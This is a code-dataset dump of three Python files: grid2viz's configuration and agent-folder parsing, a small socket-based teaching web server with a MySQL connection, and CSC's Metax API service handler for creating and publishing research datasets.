os.getcwd()#os.path.dirname(os.path.abspath((os.path.join(os.path.abspath(__file__), os.pardir))))\n os.environ[\"GRID2VIZ_ROOT\"] = pkg_root_dir\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\nelse:\n path_cfg = os.path.join(os.environ[\"GRID2VIZ_ROOT\"], \"config.ini\")\n\nparser = configparser.ConfigParser()\nprint(\n Fore.BLUE + Style.BRIGHT + \"The config file used is located at: {}\".format(path_cfg)\n)\nparser.read(path_cfg)\n\nagents_dir = parser.get(\"DEFAULT\", \"agents_dir\")\nprint(Fore.BLUE + \"Agents data used is located at: {}\".format(agents_dir))\ncache_dir = os.path.join(agents_dir, \"_cache\")\n\"\"\"Parsing of agent folder tree\"\"\"\nagents = sorted(\n [\n file\n for file in os.listdir(agents_dir)\n if os.path.isdir(os.path.join(agents_dir, file)) and not file.startswith(\"_\")\n ]\n)\nmeta_json, best_agents, survival_df, attention_df = check_all_tree_and_get_meta_and_best(\n agents_dir, agents\n)\nscenarios = []\nscenarios_agent = {}\nagent_scenario = {}\n\ntry:\n n_cores = int(parser.get(\"DEFAULT\", \"n_cores\"))\nexcept configparser.NoOptionError:\n n_cores = 1\n\nfor agent in agents:\n scen_path = os.path.join(agents_dir, agent)\n scens = [\n file\n for file in os.listdir(scen_path)\n if os.path.isdir(os.path.join(scen_path, file))\n ]\n scenarios_agent[agent] = scens\n for scen in scens:\n if scen not in agent_scenario:\n agent_scenario[scen] = []\n if agent not in agent_scenario[scen]:\n agent_scenario[scen].append(agent)\n scenarios = scenarios + scens\n\nscenarios = set(scenarios)\nenv_path = parser.get(\"DEFAULT\", \"env_dir\")\n# Create a .grid2viz directory in the user home directory\ngrid2viz_home_directory = Path.home() / \".grid2viz\"\ngrid2viz_home_directory.mkdir(parents=False, exist_ok=True)\n", "repo_name": "rte-france/grid2viz", "sub_path": "grid2viz/src/manager.py", "file_name": "manager.py", "file_ext": "py", "file_size_in_byte": 26555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.Circle", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 57, "usage_type": "name"}, {"api_name": "scipy.spatial.ConvexHull", "line_number": 80, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 83, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 83, "usage_type": "name"}, {"api_name": "grid2op.PlotGrid.PlotPlotly", "line_number": 105, "usage_type": "call"}, {"api_name": "grid2op.PlotGrid.PlotMatplot", "line_number": 116, "usage_type": "call"}, {"api_name": "plotly.colors.sequential", "line_number": 171, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 171, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 172, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 172, "usage_type": "name"}, {"api_name": "plotly.colors.sequential", "line_number": 173, "usage_type": "attribute"}, {"api_name": "plotly.colors", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.clip", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 180, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 208, "usage_type": "call"}, {"api_name": 
"plotly.graph_objects", "line_number": 208, "usage_type": "name"}, {"api_name": "itertools.chain.from_iterable", "line_number": 223, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 223, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 261, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 283, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 283, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 299, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 315, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 315, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 350, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 362, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 363, "usage_type": "call"}, {"api_name": "time.time", "line_number": 429, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 435, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 451, "usage_type": "call"}, {"api_name": "os.path", "line_number": 451, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 458, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 459, "usage_type": "call"}, {"api_name": "os.path", "line_number": 459, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 477, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 481, "usage_type": "call"}, {"api_name": "time.time", "line_number": 486, "usage_type": "call"}, {"api_name": "time.time", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 492, "usage_type": "call"}, {"api_name": "os.path", "line_number": 492, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 494, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 497, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path", "line_number": 504, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 519, "usage_type": "call"}, {"api_name": "time.time", "line_number": 528, "usage_type": "call"}, {"api_name": "grid2viz.src.kpi.EpisodeAnalytics.EpisodeAnalytics", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 536, "usage_type": "call"}, {"api_name": "os.path", "line_number": 536, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 537, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 545, "usage_type": "call"}, {"api_name": "os.path", "line_number": 545, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 546, 
"usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 547, "usage_type": "call"}, {"api_name": "os.path", "line_number": 547, "usage_type": "attribute"}, {"api_name": "grid2op.Episode.EpisodeData.from_disk", "line_number": 548, "usage_type": "call"}, {"api_name": "grid2op.Episode.EpisodeData", "line_number": 548, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 580, "usage_type": "call"}, {"api_name": "os.path", "line_number": 580, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 585, "usage_type": "call"}, {"api_name": "os.path", "line_number": 585, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 623, "usage_type": "call"}, {"api_name": "os.path", "line_number": 623, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 624, "usage_type": "call"}, {"api_name": "os.path", "line_number": 624, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 626, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 638, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 646, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 660, "usage_type": "call"}, {"api_name": "os.path", "line_number": 660, "usage_type": "attribute"}, {"api_name": "pathos.multiprocessing.ProcessPool", "line_number": 678, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 695, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 697, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 699, "usage_type": "call"}, {"api_name": "os.path", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 699, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 701, "usage_type": "call"}, {"api_name": "os.path", "line_number": 701, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 701, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 703, "usage_type": "call"}, {"api_name": "colorama.Fore.BLUE", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Style.BRIGHT", "line_number": 705, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 705, "usage_type": "name"}, {"api_name": "colorama.Fore.BLUE", "line_number": 710, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 710, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 711, "usage_type": "call"}, {"api_name": "os.path", "line_number": 711, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 716, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 717, "usage_type": "call"}, {"api_name": "os.path", "line_number": 717, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 717, "usage_type": "call"}, {"api_name": 
"configparser.NoOptionError", "line_number": 729, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 733, "usage_type": "call"}, {"api_name": "os.path", "line_number": 733, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 736, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 750, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 750, "usage_type": "name"}]} +{"seq_id": "6064377675", "text": "\"\"\"\nhttp协议 --> 应用层协议\n浏览器会默认的加上80端口号\n\n# 1. 识别不同的网址 --> 返回不同的页面\n# 2. 能够加载外部的html文件进来\n# 3. 服务器去链接数据库\n# 4. 注册功能 --> 插入一条数据到mysql中\n# 5. 登陆功能 --> 在数据库中查询 在注册的时候插入的账户密码是否匹配\n# 6. 保持登陆 --> cookie 或者 session\n\"\"\"\nimport socket\nimport pymysql\n#tcp和ip协议\nclass WebServer:\n def __init__(self):\n self.ss = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #重启的时候 不用去改端口号\n self.ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n #绑定ip地址和端口号\n self.ss.bind(('10.2.0.26',10081))\n self.ss.listen(10)\n\n\n def run(self):\n conn,addr = self.ss.accept()\n msg = conn.recv(1024)\n url = self.get_url(msg)\n res = self.url_header(url)\n response_header = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n\" \\\n \"Connection: Closed\\r\\n\\r\\n\"\n\n with open(res,'r') as f:\n response_body = f.read()\n conn.send((response_header+response_body).encode())\n\n mysql_conn = self.mysql_conn()\n\n cursor = mysql_conn.cursor()\n\n sql ='select * from user'\n cursor.execute(sql)\n\n res = mysql_conn.commit()\n\n print(res)\n\n\n\n def url_header(self,url):\n if url == b'/':\n return 'test2.html'\n if url == b'/p1904':\n return 'tset.html'\n\n return '404.html'\n def get_url(self,msg):\n msg_list = msg.split()\n return msg_list[1]\n\n def mysql_conn(self):\n conn = pymysql.connect(\n host='10.2.0.26',\n user ='p1904', password ='p1904_123',\n database ='my_web',\n charset ='utf8')\n\n return conn\n\n\n\nif __name__ == '__main__':\n s = WebServer()\n s.run()\n", "repo_name": "JwangTec/python_resources", "sub_path": "django/web_server.py", "file_name": "web_server.py", "file_ext": "py", "file_size_in_byte": 1905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 17, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 17, "usage_type": "attribute"}, {"api_name": "socket.SOL_SOCKET", "line_number": 19, "usage_type": "attribute"}, {"api_name": "socket.SO_REUSEADDR", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pymysql.connect", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "33461524602", "text": "\"\"\"Class for handling calls to METAX API.\n\nAPI docs https://metax.fairdata.fi/docs/\nSwagger https://metax.fairdata.fi/swagger/v2\n\"\"\"\nimport time\nfrom typing import Any\n\nfrom aiohttp import BasicAuth, web\nfrom aiohttp.client_exceptions import ClientConnectorError, InvalidURL\nfrom yarl import URL\n\nfrom ..conf.conf import metax_config\nfrom ..helpers.logger import LOG\nfrom .metax_mapper import MetaDataMapper, SubjectNotFoundException\nfrom .service_handler import ServiceHandler\n\n\nclass MetaxServiceHandler(ServiceHandler):\n \"\"\"API handler for uploading submitters' metadata 
to METAX service.\"\"\"\n\n service_name = \"Metax\"\n\n def __init__(self) -> None:\n \"\"\"Define variables and paths.\n\n Define variables and paths used for connecting to Metax API and\n default inputs for Metax Dataset creation.\n\n :param req: HTTP request from calling service\n \"\"\"\n metax_url = URL(metax_config[\"url\"])\n super().__init__(\n base_url=metax_url / metax_config[\"rest_route\"][1:],\n auth=BasicAuth(metax_config[\"username\"], metax_config[\"password\"]),\n )\n\n self.connection_check_url = metax_url\n self.publish_route = metax_url / metax_config[\"publish_route\"][1:]\n\n self.minimal_dataset_template: dict[Any, Any] = {\n \"data_catalog\": metax_config[\"catalog_pid\"],\n \"metadata_provider_org\": \"csc.fi\",\n \"research_dataset\": {\n # submitter given DOI\n \"preferred_identifier\": \"\",\n \"title\": {\"en\": \"\"},\n # study abstract or dataset description\n \"description\": {\"en\": \"\"},\n # default\n \"access_rights\": {\n \"access_type\": {\n \"in_scheme\": \"http://uri.suomi.fi/codelist/fairdata/access_type\",\n \"identifier\": \"http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted\",\n }\n },\n # default\n \"publisher\": {\n \"name\": {\n \"en\": \"CSC Sensitive Data Services for Research\",\n \"fi\": \"CSC:n Arkaluonteisen datan palveluiden aineistokatalogi\",\n },\n \"@type\": \"Organization\",\n },\n },\n }\n\n async def _get(self, metax_id: str) -> dict[str, Any]:\n result: dict[str, Any] = await self._request(method=\"GET\", path=metax_id)\n LOG.info(\"Got metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _post_draft(self, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Post call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"POST\", json_data=json_data, params=\"draft\")\n LOG.info(\"Created Metax draft dataset with ID: %r.\", result[\"identifier\"])\n\n return result\n\n async def _put(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Put call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PUT\", path=metax_id, json_data=json_data)\n LOG.info(\"Metax dataset with ID: %r updated.\", metax_id)\n\n return result\n\n async def _patch(self, metax_id: str, json_data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Patch call to Metax REST API.\n\n :param metax_id: ID of dataset to be updated\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", path=metax_id, json_data=json_data)\n LOG.info(\"Patch completed for metax dataset with ID: %r.\", metax_id)\n\n return result\n\n async def _bulk_patch(self, json_data: list[dict[str, Any]]) -> dict[str, Any]:\n \"\"\"Bulk patch call to Metax REST API.\n\n :param json_data: Dict with request data\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(method=\"PATCH\", json_data=json_data)\n LOG.info(\"Bulk patch completed for metax datasets\")\n\n return result\n\n # async def _delete_draft(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # :param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # await self._request(method=\"DELETE\", 
path=metax_id)\n # LOG.debug(\"Deleted draft dataset metax ID: %r from Metax service\", metax_id)\n\n async def _publish(self, metax_id: str) -> str:\n \"\"\"Post a call to Metax RPC publish endpoint.\n\n :param metax_id: ID of dataset to be updated\n :returns: Dict with full Metax dataset\n \"\"\"\n result: dict[str, Any] = await self._request(\n method=\"POST\", url=self.publish_route, params={\"identifier\": metax_id}\n )\n LOG.info(\"Metax ID %s was published to Metax service.\", metax_id)\n\n dataset: str = result[\"preferred_identifier\"]\n return dataset\n\n async def post_dataset_as_draft(self, external_id: str, collection: str, data: dict[str, Any]) -> str:\n \"\"\"Send draft dataset to Metax.\n\n Construct Metax dataset data from submitters' Study or Dataset and\n send it as new draft dataset to Metax Dataset API.\n\n :param external_id: external user id, from OIDC provider\n :param collection: Schema of incoming submitters' metadata\n :param data: Validated Study or Dataset data dict\n :raises: HTTPError depending on returned error from Metax\n :returns: Metax ID for dataset returned by Metax API\n \"\"\"\n LOG.debug(\n \"Creating draft dataset to Metax service from collection: %r with accession ID: %r.\",\n collection,\n {data[\"accessionId\"]},\n )\n await self.check_connection()\n metax_dataset = self.minimal_dataset_template\n metax_dataset[\"metadata_provider_user\"] = external_id\n if collection == \"dataset\":\n dataset_data = self.create_metax_dataset_data_from_dataset(data)\n else:\n dataset_data = self.create_metax_dataset_data_from_study(data)\n metax_dataset[\"research_dataset\"] = dataset_data\n\n metax_data = await self._post_draft(metax_dataset)\n LOG.debug(\n \"Created Metax draft dataset for: %r with accession ID: %r with data: %r.\",\n collection,\n data[\"accessionId\"],\n metax_data,\n )\n metax_id: str = metax_data[\"identifier\"]\n # Metax service overwrites preferred id (DOI) with temporary id for draft datasets\n # Patching dataset with full research_dataset data updates preferred id to the real one\n LOG.debug(\"Updating Metax draft dataset with ID: %r with permanent preferred identifier.\", metax_id)\n await self._patch(metax_id, {\"research_dataset\": dataset_data})\n return metax_id\n\n # async def update_draft_dataset(self, external_id: str, collection: str, data: Dict) -> None:\n # \"\"\"Update draft dataset to Metax.\n #\n # Construct Metax draft dataset data from submitters' Study or Dataset and\n # send it to Metax Dataset API for update.\n #\n # :param external_id: external user id, from OIDC provider\n # :param collection: Schema of incoming submitters' metadata\n # :param data: Validated Study or Dataset data dict\n # :raises: HTTPError depending on returned error from Metax\n # \"\"\"\n # LOG.info(\"Updating collection: %r object data to Metax service.\", collection)\n # await self.check_connection()\n # metax_dataset = self.minimal_dataset_template\n # metax_dataset[\"metadata_provider_user\"] = external_id\n # if collection == \"dataset\":\n # dataset_data = self.create_metax_dataset_data_from_dataset(data)\n # else:\n # dataset_data = self.create_metax_dataset_data_from_study(data)\n # metax_dataset[\"research_dataset\"] = dataset_data\n #\n # metax_data = await self._put(data[\"metaxIdentifier\"], metax_dataset)\n # LOG.debug(\"Updated metax ID: %r, new metadata is: %r\", data[\"metaxIdentifier\"], metax_data)\n #\n # async def delete_draft_dataset(self, metax_id: str) -> None:\n # \"\"\"Delete draft dataset from Metax service.\n #\n # 
:param metax_id: Identification string pointing to Metax dataset to be deleted\n # \"\"\"\n # LOG.info(\"Deleting Metax draft dataset metax ID: %r\", metax_id)\n # await self._delete_draft(metax_id)\n\n async def update_dataset_with_doi_info(\n self, datacite_info: dict[str, Any], metax_ids: list[dict[str, Any]]\n ) -> None:\n \"\"\"Update dataset for publishing.\n\n :param datacite_info: Dict containing info to complete metax dataset metadata\n :param metax_ids: List of Metax id of dataset to be updated\n :raises: HTTPBadRequest if mapping datacite info to metax fails\n \"\"\"\n LOG.info(\n \"Updating metadata with datacite info for Metax datasets: %r\",\n \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]),\n )\n bulk_data = []\n for metax_id in metax_ids:\n metax_data: dict[str, Any] = await self._get(metax_id[\"metaxIdentifier\"])\n\n # Map fields from doi info to Metax schema\n mapper = MetaDataMapper(metax_id[\"schema\"], metax_data[\"research_dataset\"], datacite_info)\n try:\n mapped_metax_data = mapper.map_metadata()\n except SubjectNotFoundException as error:\n # in case the datacite subject cannot be mapped to metax field of science\n reason = f\"{error}\"\n LOG.exception(reason)\n raise web.HTTPBadRequest(reason=reason)\n\n bulk_data.append({\"identifier\": metax_id[\"metaxIdentifier\"], \"research_dataset\": mapped_metax_data})\n\n await self._bulk_patch(bulk_data)\n\n async def update_draft_dataset_description(self, metax_id: str, description: str) -> None:\n \"\"\"Update the description of the draft dataset.\n\n :param metax_id: metax dataset id\n :param description: New description\n :raises: HTTPError depending on returned error from Metax\n \"\"\"\n LOG.info(\"Updating the description of Metax ID: %r.\", metax_id)\n data = await self._get(metax_id)\n data[\"research_dataset\"][\"description\"][\"en\"] = description\n metax_data = await self._put(metax_id, data)\n LOG.debug(\"Updated description of Metax ID: %r, new metadata is: %r\", metax_id, metax_data)\n\n async def publish_dataset(self, metax_ids: list[dict[str, Any]]) -> None:\n \"\"\"Publish draft dataset to Metax service.\n\n Iterate over the metax ids that need to be published.\n\n :param metax_ids: List of metax IDs that include study and datasets\n \"\"\"\n LOG.info(\"Publishing Metax datasets: %s\", \",\".join([id[\"metaxIdentifier\"] for id in metax_ids]))\n\n for obj in metax_ids:\n metax_id = obj[\"metaxIdentifier\"]\n doi = obj[\"doi\"]\n preferred_id = await self._publish(metax_id)\n\n if doi != preferred_id:\n LOG.warning(\"Metax Preferred Identifier: %r does not match object's DOI: %r.\", preferred_id, doi)\n LOG.debug(\n \"Object with Metax ID: %r and DOI: %r is published to Metax service.\",\n obj[\"metaxIdentifier\"],\n obj[\"doi\"],\n )\n\n def create_metax_dataset_data_from_study(self, data: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Construct Metax dataset's research dataset dictionary from Submitters Study.\n\n :param data: Study data\n :returns: Constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"descriptor\"][\"studyTitle\"]\n research_dataset[\"description\"][\"en\"] = data[\"descriptor\"][\"studyAbstract\"]\n LOG.debug(\"Created Metax dataset from Study with data: %r\", research_dataset)\n return research_dataset\n\n def create_metax_dataset_data_from_dataset(self, data: dict[str, Any]) -> dict[str, Any]:\n 
\"\"\"Construct Metax dataset's research dataset dictionary from Submitters Dataset.\n\n :param data: Dataset data\n :returns: constructed research dataset\n \"\"\"\n research_dataset: dict[str, Any] = self.minimal_dataset_template[\"research_dataset\"]\n research_dataset[\"preferred_identifier\"] = data[\"doi\"]\n research_dataset[\"title\"][\"en\"] = data[\"title\"]\n research_dataset[\"description\"][\"en\"] = data[\"description\"]\n LOG.debug(\"Created Metax dataset from Dataset with data: %r\", research_dataset)\n return research_dataset\n\n async def _healtcheck(self) -> dict[str, str]:\n \"\"\"Check Metax service health.\n\n This responds with pong, when pinged.\n\n :returns: Dict with status of the datacite status\n \"\"\"\n try:\n start = time.time()\n async with self._client.request(\n method=\"GET\",\n url=f\"{URL(metax_config['url'])}/watchman/ping/\",\n timeout=10,\n ) as response:\n LOG.debug(\"Metax REST API status is: %s.\", response.status)\n content = await response.text()\n if response.status == 200 and content == \"pong\":\n status = \"Ok\" if (time.time() - start) < 1000 else \"Degraded\"\n else:\n status = \"Down\"\n\n return {\"status\": status}\n except ClientConnectorError as e:\n LOG.exception(\"Metax REST API is down with error: %r.\", e)\n return {\"status\": \"Down\"}\n except InvalidURL as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n except web.HTTPError as e:\n LOG.exception(\"Metax REST API status retrieval failed with: %r.\", e)\n return {\"status\": \"Error\"}\n", "repo_name": "CSCfi/metadata-submitter", "sub_path": "metadata_backend/services/metax_service_handler.py", "file_name": "metax_service_handler.py", "file_ext": "py", "file_size_in_byte": 14440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "service_handler.ServiceHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "yarl.URL", "line_number": 32, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 32, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 34, "usage_type": "name"}, {"api_name": "aiohttp.BasicAuth", "line_number": 35, "usage_type": "call"}, {"api_name": "conf.conf.metax_config", "line_number": 35, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 41, "usage_type": "name"}, {"api_name": "conf.conf.metax_config", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 69, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 70, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 80, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 81, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 93, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 97, 
"usage_type": "name"}, {"api_name": "typing.Any", "line_number": 104, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 105, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 105, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 109, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 115, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 116, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 116, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 134, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 137, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 137, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 142, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 154, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 154, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 169, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 169, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 178, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 223, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "metax_mapper.MetaDataMapper", "line_number": 232, "usage_type": "call"}, {"api_name": "metax_mapper.SubjectNotFoundException", "line_number": 235, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.exception", "line_number": 238, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 238, "usage_type": "name"}, {"api_name": "aiohttp.web.HTTPBadRequest", "line_number": 239, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 239, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 252, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 252, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 256, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.info", "line_number": 265, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 265, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.warning", "line_number": 273, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 273, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 274, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 290, "usage_type": "call"}, {"api_name": "helpers.logger.LOG", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "helpers.logger.LOG.debug", "line_number": 303, "usage_type": 
